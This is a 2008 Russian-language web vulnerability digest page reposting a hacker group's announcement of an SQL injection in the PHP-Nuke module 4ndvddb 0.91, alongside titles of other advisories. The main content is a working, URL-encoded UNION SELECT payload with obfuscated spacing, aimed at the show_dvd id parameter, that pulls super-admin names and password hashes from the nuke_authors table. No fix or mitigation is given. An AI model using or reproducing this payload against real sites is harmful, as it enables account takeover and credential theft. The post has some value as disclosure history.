Дополнительная информация

Ежедневная сводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower

Insufficient Anti-automation vulnerability in RavenNuke

From:	lovebug_(at)_hotmail.it <lovebug_(at)_hotmail.it>
Date:	9 июля 2008 г.
Subject:	PHP-NUKE SQL Module's Name 4ndvddb

Module's Name: 4ndvddb
Module's Version: 0.91

+---------------------------------------+
|  SQL Injection Vulnerability PHP-NUKE
 | Module's Name: 4ndvddb
|          Module's Version: 0.91     |
|         found by lovebug       |
|            RBT-4 |
           www.rbt-4.net
+---------------------------------------+


#vuln: modules.php?name=4ndvddb&rop=show_dvd&id=

#sql= 1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2
A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,
10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F
%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%
2A